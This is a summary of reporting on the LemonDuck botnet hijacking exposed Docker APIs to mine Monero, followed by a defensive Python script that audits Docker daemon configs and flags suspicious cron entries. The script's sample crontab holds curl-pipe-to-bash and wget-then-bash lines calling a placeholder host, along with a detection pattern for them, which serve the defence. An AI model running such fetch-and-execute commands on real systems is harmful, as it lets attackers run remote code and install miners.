"LemonDuck Botnet Plunders Docker Cloud Instances in Cryptocurrency Crime Wave"

LemonDuck botnet operators are targeting Docker instances in a cryptocurrency mining campaign. According to researchers, LemonDuck is cryptocurrency-mining malware with a botnet structure that exploits older vulnerabilities, such as the Microsoft Exchange ProxyLogon bugs, to gain access to cloud systems and servers. Microsoft's security team has noted that the operators time their attacks deliberately, striking while defenders are busy patching a vulnerability rather than investigating a compromise. CrowdStrike reports that LemonDuck has expanded its operations from Windows machines to Linux and Docker.

The threat actors are now targeting exposed Docker Application Programming Interfaces (APIs) to infiltrate cloud instances. Researchers found that LemonDuck takes advantage of misconfigurations that expose the Docker API to the network, using that access to deploy exploit kits and launch malware. In one case, the API was used to run a container with a custom Docker ENTRYPOINT instruction that downloaded a Bash script disguised as an image file. The file was fetched from a domain in LemonDuck's command-and-control (C2) infrastructure, which researchers found to be serving multiple campaigns targeting Windows and Linux. The script installs a Linux cron job in the compromised container, which then downloads a secondary Bash file: the main LemonDuck payload. Once triggered by the cron job, LemonDuck kills network connections, rival cryptocurrency-mining operations and their existing connections to mining pools, and other processes. It also targets known monitoring daemons, such as Alibaba Cloud's monitoring service. With the server prepared, mining begins: XMRig, used to mine Monero (XMR), is executed with a configuration that points at proxy pools in order to hide the attacker's true cryptocurrency wallet address.

The malware does not stop at one Docker instance: it also searches the file system for SSH keys and uses them to log into other servers and repeat its operations. This article continues to discuss the LemonDuck botnet's targeting of exposed Docker APIs.
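Two checks a defender would run against the chain described above, written as an added example for this page (not code from the article or from CrowdStrike): the first audits a Docker daemon.json for the misconfiguration that makes the API reachable over the network without TLS client verification (Docker's real `hosts`, `tlsverify` and `tls*` keys, with a weak and a hardened sample config constructed here), and the second scans crontab text for the fetch-and-execute persistence pattern (a cron entry that downloads something and pipes or hands it straight to a shell). The sample crontab, file names and `example.invalid` hostnames are constructed for illustration and are not real LemonDuck infrastructure.

```python
"""Audit helpers for the Docker/cron intrusion chain summarized above.

  1. audit_docker_daemon_config(): does daemon.json expose the Docker API over
     plain TCP without TLS client verification?
  2. find_fetch_and_exec_cron(): which crontab lines download content and
     execute it immediately (the cron -> download secondary Bash payload step)?
"""
import json
import re
from typing import Dict, List

# Constructed sample daemon.json documents, not taken from any real host.
WEAK_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})

HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})


def audit_docker_daemon_config(daemon_json: str) -> List[str]:
    """Return findings for TCP listeners declared in a daemon.json document.

    An unauthenticated tcp:// listener gives anyone who can reach the port the
    equivalent of root on the host: they can start a container with any
    ENTRYPOINT and any bind mount, which is the access the article describes.
    """
    cfg = json.loads(daemon_json)
    findings = []
    for host in cfg.get("hosts", []):
        if not host.startswith("tcp://"):
            continue  # unix:// and fd:// sockets are gated by file permissions
        addr = host[len("tcp://"):]
        if not cfg.get("tlsverify", False):
            findings.append(f"{host}: Docker API over TCP without TLS client verification")
        if addr.startswith("0.0.0.0:") or addr.startswith("[::]:"):
            findings.append(f"{host}: listener bound to all interfaces")
    return findings


# Constructed crontab sample.  Lines 3 and 4 mimic the pattern the article
# describes (periodic download of a script that is executed right away);
# the hostnames are placeholders.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/10 * * * * curl -fsSL http://example.invalid/img.png | bash
*/5 * * * * wget -q -O /tmp/a.sh http://example.invalid/a.sh && bash /tmp/a.sh
30 2 * * 0 /opt/backup/run.sh
"""

# A downloader followed by a shell: either piped ("| bash") or chained
# ("&& sh /tmp/file", "; bash /tmp/file").
_FETCH_AND_EXEC = re.compile(
    r"\b(curl|wget)\b[^|;&]*"          # downloader and its arguments
    r"(\|\s*(ba)?sh\b"                 # ... piped into a shell
    r"|(&&|;)\s*(ba)?sh\b)"            # ... or followed by sh/bash <file>
)


def find_fetch_and_exec_cron(crontab_text: str) -> List[Dict[str, object]]:
    """Return the crontab entries that fetch remote content and execute it."""
    hits = []
    for lineno, line in enumerate(crontab_text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if _FETCH_AND_EXEC.search(stripped):
            hits.append({"line": lineno, "entry": stripped})
    return hits


if __name__ == "__main__":
    print("weak daemon.json:", audit_docker_daemon_config(WEAK_DAEMON_JSON))
    print("hardened daemon.json:", audit_docker_daemon_config(HARDENED_DAEMON_JSON))
    for hit in find_fetch_and_exec_cron(SAMPLE_CRONTAB):
        print(f"suspicious cron entry (line {hit['line']}): {hit['entry']}")
```

The daemon check is deliberately strict: binding the API to a specific interface is not a fix on its own, because without `tlsverify` any client on that network segment can still drive the daemon, so the hardened sample both limits the bind address and requires client certificates. The cron regex is a triage filter, not proof of compromise; a hit should be followed by pulling the downloaded file and inspecting it, since, as the article notes, the payload in this campaign was named as an image file.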

ZDNet reports "LemonDuck Botnet Plunders Docker Cloud Instances in Cryptocurrency Crime Wave"
